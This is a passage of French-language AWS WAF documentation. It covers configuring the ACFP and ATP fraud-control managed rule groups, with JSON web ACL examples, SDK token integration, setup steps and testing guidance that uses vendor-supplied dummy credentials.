      "Priority": 0,
      "Statement": {
        "ManagedRuleGroupStatement": {
          "VendorName": "AWS",
          "Name": "AWSManagedRulesACFPRuleSet",
          "ManagedRuleGroupConfigs": [
            {
              "AWSManagedRulesACFPRuleSet": {
                "CreationPath": "/web/signup/submit-registration",
                "RegistrationPagePath": "/web/signup/registration",
                "RequestInspection": {
                  "PayloadType": "JSON",
                  "UsernameField": {
                    "Identifier": "/form/username"
                  },
                  "PasswordField": {
                    "Identifier": "/form/password"
                  },
                  "EmailField": {
                    "Identifier": "/form/email"
                  },
                  "PhoneNumberFields": [
                    {
                      "Identifier": "/form/country-code"
                    },
                    {
                      "Identifier": "/form/region-code"
                    },
                    {
                      "Identifier": "/form/phonenumber"
                    }
                  ],
                  "AddressFields": [
                    {
                      "Identifier": "/form/name"
                    },
                    {
                      "Identifier": "/form/street-address"
                    },
                    {
                      "Identifier": "/form/city"
                    },
                    {
                      "Identifier": "/form/state"
                    },
                    {
                      "Identifier": "/form/zipcode"
                    }
                  ]
                },
                "EnableRegexInPath": false
              }
            }
          ],
          "RuleActionOverrides": [
            {
              "Name": "SignalCredentialCompromised",
              "ActionToUse": {
                "Count": {}
              }
            }
          ]
        }
      },
      "OverrideAction": {
        "None": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "AWS-AWSManagedRulesACFPRuleSet"
      }
    },
    {
      "Name": "AccountSignupCompromisedCredentialsHandling",
      "Priority": 1,
      "Statement": {
        "LabelMatchStatement": {
          "Scope": "LABEL",
          "Key": "awswaf:managed:aws:acfp:signal:credential_compromised"
        }
      },
      "Action": {
        "Block": {
          "CustomResponse": {
            "ResponseCode": 406,
            "CustomResponseBodyKey": "aws-waf-credential-compromised",
            "ResponseHeaders": [
              {
                "Name": "aws-waf-credential-compromised",
                "Value": "true"
              }
            ]
          }
        }
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "AccountSignupCompromisedCredentialsHandling"
      }
    }
  ],
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "compromisedCreds"
  },
  "Capacity": 51,
  "ManagedByFirewallManager": false,
  "RetrofittedByFirewallManager": false,
  "LabelNamespace": "awswaf:111122223333:webacl:compromisedCreds:",
  "CustomResponseBodies": {
    "aws-waf-credential-compromised": {
      "ContentType": "APPLICATION_JSON",
      "Content": "{\n  \"credentials-compromised\": \"The credentials you provided have been found in a compromised credentials database.\\n\\nTry again with a different username, password pair.\"\n}"
    }
  }
}
```

# Exemple ACFP : configuration de l'inspection des réponses
<a name="waf-acfp-control-example-response-inspection"></a>

La liste JSON suivante montre un exemple de pack de protection (ACL Web) avec un groupe de règles géré par AWS WAF Fraud Control pour la création de comptes et la prévention des fraudes (ACFP) configuré pour inspecter les réponses d'origine. Notez la configuration de l'inspection des réponses, qui spécifie les codes de réussite et d'état de réponse. Vous pouvez également configurer les paramètres de réussite et de réponse en fonction des correspondances JSON entre en-tête, corps et corps. Ce JSON inclut les paramètres générés automatiquement par le pack de protection (ACL Web), tels que l'espace de noms des étiquettes et l'URL d'intégration des applications du pack de protection (ACL Web).

**Note**  
L'inspection des réponses ATP n'est disponible que dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions.

```
{
  "Name": "simpleACFP",
  "Id": "... ",
  "ARN": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/simpleACFP/... ",
  "DefaultAction": {
    "Allow": {}
  },
  "Description": "",
  "Rules": [
    {
      "Name": "AWS-AWSManagedRulesACFPRuleSet",
      "Priority": 0,
      "Statement": {
        "ManagedRuleGroupStatement": {
          "VendorName": "AWS",
          "Name": "AWSManagedRulesACFPRuleSet",
          "ManagedRuleGroupConfigs": [
            {
              "AWSManagedRulesACFPRuleSet": {
                "CreationPath": "/web/signup/submit-registration",
                "RegistrationPagePath": "/web/signup/registration",
                "RequestInspection": {
                  "PayloadType": "JSON",
                  "UsernameField": {
                    "Identifier": "/form/username"
                  },
                  "PasswordField": {
                    "Identifier": "/form/password"
                  },
                  "EmailField": {
                    "Identifier": "/form/email"
                  },
                  "PhoneNumberFields": [
                    {
                      "Identifier": "/form/country-code"
                    },
                    {
                      "Identifier": "/form/region-code"
                    },
                    {
                      "Identifier": "/form/phonenumber"
                    }
                  ],
                  "AddressFields": [
                    {
                      "Identifier": "/form/name"
                    },
                    {
                      "Identifier": "/form/street-address"
                    },
                    {
                      "Identifier": "/form/city"
                    },
                    {
                      "Identifier": "/form/state"
                    },
                    {
                      "Identifier": "/form/zipcode"
                    }
                  ]
                },
                "ResponseInspection": {
                  "StatusCode": {
                    "SuccessCodes": [
                      200
                    ],
                    "FailureCodes": [
                      401
                    ]
                  }
                },
                "EnableRegexInPath": false
              }
            }
          ]
        }
      },
      "OverrideAction": {
        "None": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "AWS-AWSManagedRulesACFPRuleSet"
      }
    }
  ],
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "simpleACFP"
  },
  "Capacity": 50,
  "ManagedByFirewallManager": false,
  "RetrofittedByFirewallManager": false,
  "LabelNamespace": "awswaf:111122223333:webacl:simpleACFP:"
  }
```

# AWS WAF Contrôle des fraudes et prévention des prises de contrôle des comptes (ATP)
<a name="waf-atp"></a>

Cette section explique ce que fait la prévention du rachat de compte AWS WAF Fraud Control (ATP).

Le piratage de compte est une activité illégale en ligne par laquelle un attaquant obtient un accès non autorisé au compte d'une personne. L'attaquant peut le faire de différentes manières, par exemple en utilisant des informations d'identification volées ou en devinant le mot de passe de la victime au cours d'une série de tentatives. Lorsque l'attaquant y accède, il peut voler de l'argent, des informations ou des services à la victime. L'attaquant peut se faire passer pour la victime pour accéder à d'autres comptes qu'elle possède ou pour accéder aux comptes d'autres personnes ou organisations. En outre, ils peuvent tenter de modifier le mot de passe de l'utilisateur afin de bloquer l'accès de la victime à ses propres comptes. 

Vous pouvez surveiller et contrôler les tentatives de prise de contrôle de compte en implémentant la fonctionnalité ATP. AWS WAF propose cette fonctionnalité dans le groupe de règles AWS Managed Rules `AWSManagedRulesATPRuleSet` et l'intégration des applications associées SDKs. 

Le groupe de règles géré par ATP étiquette et gère les demandes susceptibles de faire partie de tentatives malveillantes de prise de contrôle de compte. Pour ce faire, le groupe de règles inspecte les tentatives de connexion que les clients envoient au point de terminaison de connexion de votre application. 
+ **Inspection des demandes** — ATP vous donne de la visibilité et un contrôle sur les tentatives de connexion anormales et les tentatives de connexion utilisant des informations d'identification volées, afin d'empêcher les prises de contrôle de comptes susceptibles de mener à des activités frauduleuses. ATP vérifie les combinaisons d'e-mails et de mots de passe par rapport à sa base de données d'identifiants volés, qui est régulièrement mise à jour à mesure que de nouvelles informations d'identification divulguées sont découvertes sur le Dark Web. ATP agrège les données par adresse IP et par session client afin de détecter et de bloquer les clients qui envoient trop de demandes suspectes. 
+ **Inspection des réponses** — Pour les CloudFront distributions, en plus d'inspecter les demandes de connexion entrantes, le groupe de règles ATP inspecte les réponses de votre application aux tentatives de connexion, afin de suivre les taux de réussite et d'échec. À l'aide de ces informations, ATP peut bloquer temporairement les sessions client ou les adresses IP présentant trop d'échecs de connexion. AWS WAF effectue une inspection des réponses de manière asynchrone, afin de ne pas augmenter la latence de votre trafic Web. 

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

**Note**  
La fonctionnalité ATP n'est pas disponible pour les groupes d'utilisateurs Amazon Cognito.

**Topics**
+ [AWS WAF Composants ATP](waf-atp-components.md)
+ [Utilisation de l'intégration des applications SDKs avec ATP](waf-atp-with-tokens.md)
+ [Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)](waf-atp-rg-using.md)
+ [Tester et déployer ATP](waf-atp-deploying.md)
+ [AWS WAF Exemples de prévention des prises de contrôle des fraudes (ATP)](waf-atp-control-examples.md)

# AWS WAF Composants ATP
<a name="waf-atp-components"></a>

Les principaux éléments de la prévention des prises de contrôle des AWS WAF fraudes (ATP) sont les suivants : 
+ **`AWSManagedRulesATPRuleSet`**— Les règles de ce groupe de règles AWS gérées détectent, étiquettent et gèrent différents types d'activités de prise de contrôle de compte. Le groupe de règles inspecte les requêtes `POST` Web HTTP que les clients envoient au point de terminaison de connexion spécifié. Pour les CloudFront distributions protégées, le groupe de règles inspecte également les réponses que la distribution renvoie à ces demandes. Pour obtenir la liste des règles du groupe de règles, consultez[AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md). Vous incluez ce groupe de règles dans votre pack de protection (ACL Web) à l'aide d'une déclaration de référence de groupe de règles géré. Pour plus d'informations sur l'utilisation de ce groupe de règles, consultez[Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)](waf-atp-rg-using.md). 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).
+ **Informations sur la page de connexion de votre application** : vous devez fournir des informations sur votre page de connexion lorsque vous ajoutez le groupe de `AWSManagedRulesATPRuleSet` règles à votre pack de protection (ACL Web). Cela permet au groupe de règles de restreindre l'étendue des demandes qu'il inspecte et de valider correctement l'utilisation des informations d'identification dans les requêtes Web. Le groupe de règles ATP fonctionne avec les noms d'utilisateur au format e-mail. Pour de plus amples informations, veuillez consulter [Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)](waf-atp-rg-using.md). 
+ **Pour les CloudFront distributions protégées, détails sur la façon dont votre application répond aux tentatives de connexion** : vous fournissez des informations sur les réponses de votre application aux tentatives de connexion, et le groupe de règles suit et gère les clients qui envoient trop de tentatives de connexion infructueuses. Pour plus d'informations sur la configuration de cette option, consultez[Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)](waf-atp-rg-using.md). 
+ **JavaScript et intégration des applications mobiles SDKs** : implémentez le AWS WAF JavaScript et mobile SDKs avec votre implémentation ATP pour activer l'ensemble complet des fonctionnalités proposées par le groupe de règles. De nombreuses règles ATP utilisent les informations fournies par la vérification des clients au niveau de la SDKs session et l'agrégation des comportements, nécessaires pour séparer le trafic client légitime du trafic des robots. Pour plus d'informations sur le SDKs, consultez[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md).

Vous pouvez combiner votre implémentation ATP avec les éléments suivants pour vous aider à surveiller, régler et personnaliser vos protections. 
+ **Journalisation et métriques** : vous pouvez surveiller votre trafic et comprendre comment le groupe de règles géré par l'ACFP l'affecte, en configurant et en activant les journaux, la collecte de données Amazon Security Lake et les CloudWatch métriques Amazon pour votre pack de protection (ACL Web). Les étiquettes ajoutées `AWSManagedRulesATPRuleSet` à vos requêtes Web sont incluses dans les données. Pour plus d'informations sur les options[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md), consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md), et [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) .

  En fonction de vos besoins et du trafic que vous constatez, vous souhaiterez peut-être personnaliser votre `AWSManagedRulesATPRuleSet` implémentation. Par exemple, vous souhaiterez peut-être exclure une partie du trafic de l'évaluation ATP ou modifier la façon dont elle gère certaines tentatives de prise de contrôle de compte qu'elle identifie, en utilisant des AWS WAF fonctionnalités telles que les instructions de portée réduite ou les règles de correspondance des étiquettes. 
+ **Étiquettes et règles de correspondance des étiquettes** : pour toutes les règles `AWSManagedRulesATPRuleSet` incluses, vous pouvez modifier le comportement de blocage pour qu'il soit comptabilisé, puis le comparer aux étiquettes ajoutées par les règles. Utilisez cette approche pour personnaliser la façon dont vous gérez les demandes Web identifiées par le groupe de règles géré par ATP. Pour plus d'informations sur l'étiquetage et l'utilisation des instructions de correspondance des étiquettes, consultez [Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md) et[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md). 
+ **Demandes et réponses personnalisées** : vous pouvez ajouter des en-têtes personnalisés aux demandes que vous autorisez et vous pouvez envoyer des réponses personnalisées pour les demandes que vous bloquez. Pour ce faire, vous associez votre étiquette correspondante aux fonctionnalités de demande et de réponse AWS WAF personnalisées. Pour plus d'informations sur la personnalisation des demandes et des réponses, consultez[Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

# Utilisation de l'intégration des applications SDKs avec ATP
<a name="waf-atp-with-tokens"></a>

Cette section explique comment utiliser l'intégration d'applications SDKs avec ATP.

Le groupe de règles géré par ATP nécessite les jetons de défi SDKs générés par l'intégration de l'application. Les jetons activent l'ensemble complet des protections offertes par le groupe de règles. 

Nous recommandons vivement de mettre en œuvre l'intégration des applications SDKs, pour une utilisation optimale du groupe de règles ATP. Le script de défi doit être exécuté avant le groupe de règles ATP pour que celui-ci puisse bénéficier des jetons acquis par le script. Cela se produit automatiquement lors de l'intégration de l'application SDKs. Si vous ne pouvez pas utiliser le SDKs, vous pouvez également configurer votre pack de protection (ACL Web) afin qu'il exécute l'action de CAPTCHA règle Challenge ou contre toutes les demandes qui seront inspectées par le groupe de règles ATP. L'utilisation de l'action Challenge ou de la CAPTCHA règle peut entraîner des frais supplémentaires. Pour plus d'informations sur la tarification, consultez la page [AWS WAF Pricing](https://aws.amazon.com/waf/pricing/) (Tarification). 

**Fonctionnalités du groupe de règles ATP ne nécessitant pas de jeton**  
Lorsque les requêtes Web ne comportent pas de jeton, le groupe de règles géré par ATP est capable de bloquer les types de trafic suivants :
+ Adresses IP uniques qui font de nombreuses demandes de connexion. 
+ Des adresses IP uniques qui font de nombreuses demandes de connexion infructueuses en peu de temps. 
+ Tentatives de connexion avec traversée de mots de passe, en utilisant le même nom d'utilisateur mais en modifiant les mots de passe. 

**Fonctionnalités du groupe de règles ATP nécessitant un jeton**  
Les informations fournies dans le jeton de défi étendent les capacités du groupe de règles et améliorent la sécurité globale de vos applications clientes. 

Le jeton fournit des informations sur le client à chaque demande Web, ce qui permet au groupe de règles ATP de séparer les sessions client légitimes des sessions client mal gérées, même lorsque les deux proviennent d'une seule adresse IP. Le groupe de règles utilise les informations contenues dans les jetons pour agréger le comportement des demandes de session client afin d'affiner la détection et l'atténuation. 

Lorsque le jeton est disponible dans les requêtes Web, le groupe de règles ATP peut détecter et bloquer les catégories supplémentaires de clients suivantes au niveau de la session : 
+ Des sessions client qui échouent au défi silencieux lancé par le SDKs manager. 
+ Sessions client qui utilisent des noms d'utilisateur ou des mots de passe. C'est ce que l'on appelle également le credential stuffing.
+ Sessions clientes qui utilisent à plusieurs reprises des informations d'identification volées pour se connecter.
+ Sessions client qui passent beaucoup de temps à essayer de se connecter. 
+ Sessions clients qui font de nombreuses demandes de connexion. Le groupe de règles ATP permet une meilleure isolation des clients que la règle AWS WAF basée sur le taux, qui peut bloquer les clients par adresse IP. Le groupe de règles ATP utilise également un seuil inférieur. 
+ Sessions clients qui font de nombreuses demandes de connexion infructueuses en peu de temps. Cette fonctionnalité est disponible pour les CloudFront distributions Amazon protégées.

Pour plus d'informations sur les fonctionnalités des groupes de règles, consultez[AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md).

Pour plus d'informations sur le SDKs, voir[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md). Pour plus d'informations sur AWS WAF les jetons, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Pour plus d'informations sur les actions des règles, consultez[CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).

# Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)
<a name="waf-atp-rg-using"></a>

Cette section explique comment ajouter et configurer le groupe de `AWSManagedRulesATPRuleSet` règles.

Pour configurer le groupe de règles géré par ATP afin de reconnaître les activités de prise de contrôle de compte dans votre trafic Web, vous fournissez des informations sur la manière dont les clients envoient des demandes de connexion à votre application. Pour les CloudFront distributions Amazon protégées, vous fournissez également des informations sur la manière dont votre application répond aux demandes de connexion. Cette configuration s'ajoute à la configuration normale d'un groupe de règles géré. 

Pour la description du groupe de règles et la liste des règles, voir[AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md).

**Note**  
La base de données d'identification volées ATP ne contient que des noms d'utilisateur au format e-mail.

Ce guide est destiné aux utilisateurs qui savent généralement comment créer et gérer des packs de AWS WAF protection (Web ACLs), des règles et des groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. Pour obtenir des informations de base sur l'ajout d'un groupe de règles géré à votre pack de protection (ACL Web), consultez[Ajout d'un groupe de règles géré à un pack de protection (ACL Web) via la console](waf-using-managed-rule-group.md).

**Suivez les meilleures pratiques**  
Utilisez le groupe de règles ATP conformément aux meilleures pratiques de[Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md). 

**Pour utiliser le groupe de `AWSManagedRulesATPRuleSet` règles dans votre pack de protection (ACL Web)**

1. Ajoutez le groupe de règles AWS géré `AWSManagedRulesATPRuleSet` à votre pack de protection (ACL Web) et **modifiez** les paramètres du groupe de règles avant de l'enregistrer. 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

1. Dans le volet de **configuration du groupe de règles**, fournissez les informations que le groupe de règles ATP utilise pour inspecter les demandes de connexion. 

   1. Pour **Utiliser une expression régulière dans les chemins**, activez cette option si vous souhaitez effectuer une correspondance AWS WAF d'expressions régulières pour les spécifications du chemin de votre page de connexion. 

      AWS WAF prend en charge la syntaxe des modèles utilisée par la bibliothèque PCRE, `libpcre` à quelques exceptions près. La bibliothèque est documentée sur [PCRE - Perl Compatible Regular Expressions](http://www.pcre.org/). Pour plus d'informations sur AWS WAF le support, consultez[Syntaxe d'expression régulière prise en charge dans AWS WAF](waf-regex-pattern-support.md).

   1. Pour le **chemin de connexion**, indiquez le chemin du point de terminaison de connexion de votre application. Le groupe de règles inspecte uniquement les `POST` requêtes HTTP adressées au point de connexion que vous avez spécifié.
**Note**  
La correspondance entre les points de terminaison ne fait pas la distinction majuscules/minuscules. Les spécifications Regex ne doivent pas contenir l'indicateur`(?-i)`, qui désactive la mise en correspondance insensible aux majuscules et minuscules. Les spécifications de chaîne doivent commencer par une barre oblique`/`.

      Par exemple, pour l'URL`https://example.com/web/login`, vous pouvez fournir la spécification du chemin de chaîne`/web/login`. Les chemins de connexion qui commencent par le chemin que vous avez indiqué sont considérés comme correspondants. Par exemple, `/web/login` correspond aux chemins de connexion `/web/login``/web/login/`,`/web/loginPage`, et`/web/login/thisPage`, mais ne correspond pas au chemin de connexion `/home/web/login` ou`/website/login`. 

   1. Pour **l'inspection des demandes**, spécifiez comment votre application accepte les tentatives de connexion en fournissant le type de charge utile de la demande et les noms des champs du corps de la demande où le nom d'utilisateur et le mot de passe sont fournis. La spécification des noms de champs dépend du type de charge utile.
      + **Type de charge utile JSON** — Spécifiez les noms des champs dans la syntaxe du pointeur JSON. Pour plus d'informations sur la syntaxe du pointeur JSON, consultez la documentation du pointeur [JSON (JavaScriptObject Notation) de l'Internet Engineering Task Force (IETF)](https://tools.ietf.org/html/rfc6901). 

        Par exemple, pour l'exemple de charge utile JSON suivant, la spécification du champ du nom d'utilisateur est `/login/username` et la spécification du champ du mot de passe est`/login/password`.

        ```
        {
            "login": {
                "username": "THE_USERNAME",
                "password": "THE_PASSWORD"
            }
        }
        ```
      + **Type de charge utile FORM\$1ENCODED** — Utilisez les noms des formulaires HTML.

        Par exemple, pour un formulaire HTML dont les éléments d'entrée sont nommés `username1` et`password1`, la spécification du champ du nom d'utilisateur est `username1` et celle du champ du mot de passe est`password1`.

   1. Si vous protégez des CloudFront distributions Amazon, dans la section **Inspection des réponses**, spécifiez comment votre application indique le succès ou l'échec dans ses réponses aux tentatives de connexion. 
**Note**  
L'inspection des réponses ATP n'est disponible que dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions.

      Spécifiez un seul composant dans la réponse de connexion que vous souhaitez qu'ATP inspecte. Pour les types de composants **Body** et **JSON**, AWS WAF vous pouvez inspecter les 65 536 premiers octets (64 Ko) du composant. 

      Indiquez vos critères d'inspection pour le type de composant, comme indiqué par l'interface. Vous devez fournir des critères de réussite et d'échec à inspecter dans le composant. 

      Supposons, par exemple, que votre application indique le statut d'une tentative de connexion dans le code d'état de la réponse, et qu'elle l'utilise `200 OK` en cas de réussite `401 Unauthorized` et/ou `403 Forbidden` d'échec. Vous devez définir le **type de composant** d'inspection des réponses sur **Code d'état**, puis dans la zone de texte **Succès**, entrez `200` et dans la zone de texte **Échec**, entrez `401` sur la première ligne et `403` sur la seconde.

      Le groupe de règles ATP ne compte que les réponses correspondant à vos critères de réussite ou d'échec de l'inspection. Les règles du groupe de règles agissent sur les clients alors que leur taux d'échec est trop élevé parmi les réponses prises en compte. Pour que les règles du groupe de règles se comportent correctement, veillez à fournir des informations complètes sur les tentatives de connexion réussies et échouées. 

      Pour voir les règles qui inspectent les réponses de connexion, recherchez `VolumetricIpFailedLoginResponseHigh` et `VolumetricSessionFailedLoginResponseHigh` dans la liste des règles à l'adresse[AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md). 

1. Fournissez toute configuration supplémentaire que vous souhaitez pour le groupe de règles. 

   Vous pouvez limiter davantage l'étendue des demandes inspectées par le groupe de règles en ajoutant une instruction scope-down à l'instruction du groupe de règles géré. Par exemple, vous ne pouvez inspecter que les demandes contenant un argument de requête ou un cookie spécifique. Le groupe de règles inspectera uniquement les `POST` requêtes HTTP adressées au point de connexion que vous avez spécifié et qui répondent aux critères de votre instruction scope-down. Pour plus d'informations sur les instructions de portée réduite, voir. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md)

1. Enregistrez les modifications apportées au pack de protection (ACL Web). 

Avant de déployer votre implémentation ATP pour le trafic de production, testez-la et ajustez-la dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. Consultez la section qui suit pour obtenir des conseils. 

# Tester et déployer ATP
<a name="waf-atp-deploying"></a>

Cette section fournit des conseils généraux pour configurer et tester une implémentation de prévention du piratage de compte (ATP) de contrôle des AWS WAF fraudes pour votre site. Les étapes spécifiques que vous choisirez de suivre dépendront de vos besoins, des ressources et des demandes Web que vous recevrez. 

Ces informations s'ajoutent aux informations générales sur les tests et le réglage fournies sur[Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
AWS Les règles gérées sont conçues pour vous protéger contre les menaces Web les plus courantes. Lorsqu'ils sont utilisés conformément à la documentation, les groupes de règles AWS gérées ajoutent un niveau de sécurité supplémentaire à vos applications. Cependant, les groupes de règles AWS gérées ne sont pas destinés à remplacer vos responsabilités en matière de sécurité, qui sont déterminées par les AWS ressources que vous sélectionnez. Reportez-vous au [modèle de responsabilité partagée](https://aws.amazon.com/compliance/shared-responsibility-model/) pour vous assurer que vos ressources AWS sont correctement protégées. 

**Risque lié au trafic de production**  
Avant de déployer votre implémentation ATP pour le trafic de production, testez-la et ajustez-la dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. 

AWS WAF fournit des informations d'identification de test que vous pouvez utiliser pour vérifier votre configuration ATP. Dans la procédure suivante, vous allez configurer un pack de protection test (ACL Web) pour utiliser le groupe de règles géré par ATP, configurer une règle pour capturer l'étiquette ajoutée par le groupe de règles, puis exécuter une tentative de connexion à l'aide de ces informations d'identification de test. Vous allez vérifier que votre ACL Web a correctement géré la tentative en vérifiant les CloudWatch métriques Amazon relatives à la tentative de connexion. 

Ce guide est destiné aux utilisateurs qui savent généralement comment créer et gérer des packs de AWS WAF protection (Web ACLs), des règles et des groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. 

**Pour configurer et tester une mise en œuvre de la prévention du piratage de comptes (ATP) de contrôle des AWS WAF fraudes**

Effectuez ces étapes d'abord dans un environnement de test, puis en production.

1. 

**Ajouter le groupe de règles géré par AWS WAF Fraud Control Account Takeover Prevention (ATP) en mode décompte**
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

   Ajoutez le groupe de règles AWS gérées `AWSManagedRulesATPRuleSet` à un pack de protection (ACL Web) nouveau ou existant et configurez-le de manière à ce qu'il ne modifie pas le comportement actuel du pack de protection (ACL Web). Pour plus de détails sur les règles et les libellés de ce groupe de règles, consultez[AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md).
   + Lorsque vous ajoutez le groupe de règles géré, modifiez-le et procédez comme suit : 
     + Dans le volet de **configuration du groupe de règles**, fournissez les détails de la page de connexion de votre application. Le groupe de règles ATP utilise ces informations pour surveiller les activités de connexion. Pour de plus amples informations, veuillez consulter [Ajouter le groupe de règles géré par ATP à votre pack de protection (ACL Web)](waf-atp-rg-using.md).
     + Dans le volet **Règles**, ouvrez le menu déroulant **Remplacer toutes les actions des règles** et choisissez. **Count** Avec cette configuration, AWS WAF évalue les demandes par rapport à toutes les règles du groupe de règles et ne compte que les correspondances qui en résultent, tout en ajoutant des étiquettes aux demandes. Pour de plus amples informations, veuillez consulter [Remplacer les actions des règles dans un groupe de règles](web-acl-rule-group-settings.md#web-acl-rule-group-rule-action-override).

       Grâce à cette dérogation, vous pouvez surveiller l'impact potentiel des règles gérées par l'ATP afin de déterminer si vous souhaitez ajouter des exceptions, telles que des exceptions pour des cas d'utilisation internes. 
   + Positionnez le groupe de règles de manière à ce qu'il soit évalué selon vos règles existantes dans le pack de protection (ACL Web), avec un paramètre de priorité supérieur à celui des règles ou groupes de règles que vous utilisez déjà. Pour de plus amples informations, veuillez consulter [Définition de la priorité des règles](web-acl-processing-order.md). 

     De cette façon, votre gestion actuelle du trafic n'est pas perturbée. Par exemple, si vous avez des règles qui détectent le trafic malveillant tel que l'injection SQL ou les scripts intersites, elles continueront à le détecter et à le consigner. Par ailleurs, si vous avez des règles qui autorisent le trafic connu non malveillant, elles peuvent continuer à autoriser ce trafic, sans qu'il soit bloqué par le groupe de règles géré par ATP. Vous pouvez décider d'ajuster l'ordre de traitement lors de vos activités de test et de réglage.

1. 

**Activer la journalisation et les métriques pour le pack de protection (ACL Web)**

   Le cas échéant, configurez la journalisation, la collecte de données Amazon Security Lake, l'échantillonnage des demandes et CloudWatch les métriques Amazon pour le pack de protection (ACL Web). Vous pouvez utiliser ces outils de visibilité pour surveiller l'interaction du groupe de règles géré par ATP avec votre trafic. 
   + Pour plus d'informations sur la configuration et l'utilisation de la journalisation, consultez[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 
   + Pour plus d'informations sur Amazon Security Lake, consultez [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) et [Collecte de données à partir AWS des services](https://docs.aws.amazon.com/security-lake/latest/userguide/internal-sources.html) décrits dans le *guide de l'utilisateur d'Amazon Security Lake*. 
   + Pour plus d'informations sur CloudWatch les métriques Amazon, consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md). 
   + Pour plus d'informations sur l'échantillonnage des requêtes Web, consultez[Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 

1. 

**Associer le pack de protection (ACL Web) à une ressource**

   Si le pack de protection (ACL Web) n'est pas déjà associé à une ressource de test, associez-le. Pour plus d'informations, consultez [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md).

1. 

**Surveillez le trafic et les correspondances aux règles ATP**

   Assurez-vous que votre trafic normal circule et que les règles des groupes de règles gérés par ATP ajoutent des étiquettes aux requêtes Web correspondantes. Vous pouvez voir les étiquettes dans les journaux, ainsi que l'ATP et les métriques relatives aux étiquettes dans les CloudWatch statistiques Amazon. Dans les journaux, les règles que vous avez remplacées pour être prises en compte dans le groupe de règles apparaissent dans le `ruleGroupList` champ « `action` set to count » et `overriddenAction` indiquent l'action de règle configurée que vous avez remplacée. 

1. 

**Testez les capacités de vérification des informations d'identification du groupe de règles**

   Effectuez une tentative de connexion en testant les informations d'identification compromises et vérifiez que le groupe de règles correspond à celles-ci comme prévu. 

   1. Connectez-vous à la page de connexion de votre ressource protégée à l'aide de la paire d'identifiants de AWS WAF test suivante : 
      + Utilisateur : `WAF_TEST_CREDENTIAL@wafexample.com`
      + Mot de passe : `WAF_TEST_CREDENTIAL_PASSWORD`

      Ces informations d'identification de test sont classées dans la catégorie des informations d'identification compromises, et le groupe de règles géré par ATP ajoutera l'`awswaf:managed:aws:atp:signal:credential_compromised`étiquette à la demande de connexion, que vous pouvez voir dans les journaux. 

